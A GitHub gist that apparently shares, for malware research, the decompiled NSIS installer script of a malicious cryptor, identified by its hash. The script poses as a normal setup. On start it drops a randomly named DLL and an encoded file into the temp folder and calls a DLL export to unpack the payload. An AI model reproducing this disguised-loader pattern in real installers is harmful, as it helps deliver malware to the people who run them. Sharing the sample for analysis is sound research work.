-
-
Save hshrzd/9c1bbed161efa2f3bbb2c8ba428e0125 to your computer and use it in GitHub Desktop.
NSIS script from a maliciou cryptor (90c968905405e89ebb8aece8656238dae5aabd40acf795587d3c918b2d8df284)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; NSIS script NSIS-3 BadCmd=11 | |
; Install | |
SetCompressor lzma | |
SetCompressorDictSize 8 | |
; -------------------- | |
; HEADER SIZE: 3291 | |
; START HEADER SIZE: 300 | |
; MAX STRING LENGTH: 1024 | |
; STRING CHARS: 805 | |
OutFile [NSIS].exe | |
!include WinMessages.nsh | |
; -------------------- | |
; LANG TABLES: 1 | |
; LANG STRINGS: 47 | |
Name postictal | |
BrandingText "Nullsoft Install System v3.06.1" | |
; LANG: 1033 | |
LangString LSTR_0 1033 "Nullsoft Install System v3.06.1" | |
LangString LSTR_1 1033 "$(LSTR_2) Setup" | |
LangString LSTR_2 1033 postictal | |
LangString LSTR_5 1033 "Can't write: " | |
LangString LSTR_8 1033 "Could not find symbol: " | |
LangString LSTR_9 1033 "Could not load: " | |
LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?" | |
LangString LSTR_21 1033 "Extract: " | |
LangString LSTR_22 1033 "Extract: error writing to file " | |
LangString LSTR_24 1033 "No OLE for: " | |
LangString LSTR_25 1033 "Output folder: " | |
LangString LSTR_29 1033 "Skipped: " | |
LangString LSTR_30 1033 "Copy Details To Clipboard" | |
LangString LSTR_36 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file." | |
LangString LSTR_37 1033 Custom | |
LangString LSTR_38 1033 Cancel | |
LangString LSTR_39 1033 ": Installing" | |
LangString LSTR_40 1033 "Show &details" | |
LangString LSTR_41 1033 Completed | |
LangString LSTR_42 1033 "< &Back" | |
LangString LSTR_43 1033 "&Next >" | |
LangString LSTR_44 1033 "Click Next to continue." | |
LangString LSTR_45 1033 ": Completed" | |
LangString LSTR_46 1033 &Close | |
InstType $(LSTR_37) ; Custom | |
InstallDir $TEMP | |
; wininit = $WINDIR\wininit.ini | |
; -------------------- | |
; PAGES: 2 | |
; Page 0 | |
Page instfiles | |
CompletedText $(LSTR_41) ; Completed | |
DetailsButtonText $(LSTR_40) ; "Show &details" | |
/* | |
; Page 1 | |
Page COMPLETED | |
*/ | |
; -------------------- | |
; SECTIONS: 1 | |
; COMMANDS: 29 | |
Function .onInit | |
SetOutPath $INSTDIR | |
File $INSTDIR\o15bmldpqdxcin.dll | |
File $INSTDIR\emvmcmzr.n | |
System::Call $INSTDIR\o15bmldpqdxcin.dll::Gxkeoxkzs(w$\"$INSTDIR\emvmcmzr.n$\") | |
; Call Initialize_____Plugins | |
; SetOverwrite off | |
; File $PLUGINSDIR\System.dll | |
; SetDetailsPrint lastused | |
; Push $INSTDIR\o15bmldpqdxcin.dll::Gxkeoxkzs(w$\"$INSTDIR\emvmcmzr.n$\") | |
; CallInstDLL $PLUGINSDIR\System.dll Call | |
DetailPrint label | |
StrCpy $0 9 | |
IntOp $0 $0 + 4 | |
Goto $0 | |
DetailPrint done | |
FunctionEnd | |
Section ; Section_0 | |
SectionEnd | |
/* | |
Function Initialize_____Plugins | |
SetDetailsPrint none | |
StrCmp $PLUGINSDIR "" 0 label_25 | |
Push $0 | |
SetErrors | |
GetTempFileName $0 | |
Delete $0 | |
CreateDirectory $0 ; !!!! Unknown Params: $0 "" ProgramFilesDir ; 199 0 1 | |
IfErrors label_26 | |
StrCpy $PLUGINSDIR $0 | |
Pop $0 | |
label_25: | |
Return | |
label_26: | |
MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK | |
Quit | |
FunctionEnd | |
*/ | |
; -------------------- | |
; UNREFERENCED STRINGS: | |
/* | |
17 CommonFilesDir | |
32 "C:\Program Files" | |
49 $PROGRAMFILES | |
53 "$PROGRAMFILES\Common Files" | |
70 $COMMONFILES | |
*/ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Sample: 90c968905405e89ebb8aece8656238dae5aabd40acf795587d3c918b2d8df284